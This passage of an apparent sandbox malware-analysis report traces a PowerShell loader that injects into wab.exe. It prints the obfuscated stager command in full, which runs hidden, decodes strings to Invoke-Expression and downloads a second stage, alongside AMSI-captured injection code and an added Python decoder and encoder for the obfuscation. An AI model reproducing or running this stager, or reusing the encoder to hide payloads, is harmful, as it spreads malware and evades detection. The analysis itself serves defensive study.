        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wininet.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iertutil.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: sspicli.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.storage.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wldp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: profapi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: kernel.appcore.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winhttp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iphlpapi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mswsock.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winnsi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: urlmon.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: srvcli.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: netutils.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dnsapi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: fwpuclnt.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rasadhlp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: schannel.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mskeyprotect.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ntasn1.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: msasn1.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dpapi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptsp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rsaenh.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptbase.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: gpapi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ncrypt.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ncryptsslp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mscoree.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: version.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: secur32.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wbemcomn.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: amsi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: userenv.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb{ | source: powershell.exe, 00000006.00000002.2630903523.00000000084F5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ws\Mion.pdb | source: powershell.exe, 00000006.00000002.2630903523.00000000084F5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb | source: powershell.exe, 00000006.00000002.2617016962.000000000300F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbk | source: powershell.exe, 00000006.00000002.2617016962.000000000300F000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: Yara match | File source: 00000006.00000002.2632901106.0000000009FF9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000002.2632762679.0000000008AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000002.2621078427.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.2910312975.0000017BCF83F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($spermiduct)$global:Kongebrev = [System.Text.Encoding]::ASCII.GetString($Foromtale)$global:Presbyophrenia=$Kongebrev.substring($Efteruddannelseskurser,$Beloebsfeltet)<#Thoughtfreeness
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Kdehus $Saurauia $Ubeskaarne), (Shriekery @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Afkastkonti = [AppDomain]::CurrentDomain.GetAssemblies()$global:G
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Solstiks)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Uddannnelser, $false).DefineType($Sailable, $Fis
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($spermiduct)$global:Kongebrev = [System.Text.Encoding]::ASCII.GetString($Foromtale)$global:Presbyophrenia=$Kongebrev.substring($Efteruddannelseskurser,$Beloebsfeltet)<#Thoughtfreeness
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. 
';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFForese F.ageOmulcrLaniti
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. 
';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsF
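The two `Process created` entries above capture the whole first-stage PowerShell script, and every string it needs is hidden behind the `Ugedagens` helper defined at its start: `$Rasophore` is built up as `Substring`, and the loop reads one character at index 5, 11, 17, ... of each literal (stopping one short of the end), so each plaintext character is preceded by five characters of word-fragment filler. `Semuljegrynets` then dot-sources its argument through `$adenoncus`, which decodes to `iex`, i.e. Invoke-Expression in the caller's scope. The Python below is an added example, not part of the Joe Sandbox report: it ports the decoder, pulls every `$var=Ugedagens '...'` assignment out of a captured command line and rewrites the script into readable form. The embedded excerpt is copied from the command line above; the assumption that the report's HTML rendering collapsed runs of spaces (the reason `$Currycombing` and `$Omskrivelses` are left out of the excerpt, since they no longer decode cleanly from the page text) is the editor's, not the report's.

```python
import re

# Python port of the stager's own decoder. The captured command line defines
#   $Lassoing = 1; $Rasophore = 'Sub' + 'strin' + 'g'              # -> "Substring"
#   Function Ugedagens($Outdure){ $Frys = $Outdure.Length - $Lassoing;
#     For($i = 5; $i -lt $Frys; $i += 6){ $out += $Outdure.Substring($i, $Lassoing) } $out }
# so the payload is every sixth character starting at index 5; the five characters
# before each one are filler and the literal's last character is never read.
def ugedagens(literal: str) -> str:
    return "".join(literal[i] for i in range(5, len(literal) - 1, 6))


def ugedagens_encode(payload: str, filler: str = "abcde") -> str:
    """Inverse transform, used here only to round-trip the decoder. Five filler
    characters precede each payload character and one trailing filler character
    keeps the decoder's 'Length - 1' bound from dropping the last payload char.
    (Constant filler for clarity; the real stager pads with dictionary fragments.)"""
    assert len(filler) == 5
    return "".join(filler + c for c in payload) + filler[0]


ASSIGNMENT = re.compile(r"(\$\w+)\s*=\s*Ugedagens\s+'([^']*)'")
LITERAL = re.compile(r"Ugedagens\s+'([^']*)'")


def decode_assignments(script: str) -> dict:
    """Map every `$var=Ugedagens '<literal>'` in a captured script to its plaintext."""
    return {name: ugedagens(lit) for name, lit in ASSIGNMENT.findall(script)}


def rewrite_script(script: str) -> str:
    """Replace each obfuscated literal with its plaintext and expand the eval helper.
    `Semuljegrynets` is `. ($adenoncus) (...)` and $adenoncus decodes to 'iex', so it
    is Invoke-Expression; the rewrite makes that visible to the analyst."""
    plain = LITERAL.sub(lambda m: "'" + ugedagens(m.group(1)).replace("'", "''") + "'", script)
    return plain.replace("Semuljegrynets", "Invoke-Expression")


# Assignments copied verbatim from the command line recorded above (constructed
# excerpt: only these four assignments, not the whole stager). $Currycombing and
# $Omskrivelses are omitted because repeated spaces in their filler appear to have
# been collapsed when the report was rendered, which misaligns the 6-byte stride.
STAGER_EXCERPT = (
    "$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';"
    "$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke."
    " Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtr"
    "LyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';"
    "$Astrographer=Ugedagens 'Homol>Fossi ';"
    "$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';"
)


if __name__ == "__main__":
    for name, value in decode_assignments(STAGER_EXCERPT).items():
        print(f"{name:14} -> {value!r}")
    print(rewrite_script(STAGER_EXCERPT))
```

Run as-is it prints `$adenoncus -> 'iex'`, `$Huaco -> 'User-Agent'`, `$Astrographer -> '>'` and the second-stage download URL held in `$Fluernes`, which together give the request the stager builds (a browser User-Agent header, a download, output redirected with `>`). To process the full script, paste the raw command line from the report's process tree into `STAGER_EXCERPT` rather than the rendered text shown above.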
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD347E74FB push ebx; iretd 3_2_00007FFD347E756A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD347E756B push ebx; iretd 3_2_00007FFD347E756A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04B5E3B0 push eax; retf 6_2_04B5E3B1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04B5FE08 push esp; retf 6_2_04B5FE09
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_07A008C2 push eax; mov dword ptr [esp], ecx 6_2_07A00AC4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_07A00AB8 push eax; mov dword ptr [esp], ecx 6_2_07A00AC4
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_023036CD push ebx; iretd 10_2_023036DA

        Boot Survival

        Source: Yara match | File source: 0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: wab.exe PID: 5892, type: MEMORYSTR
        Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
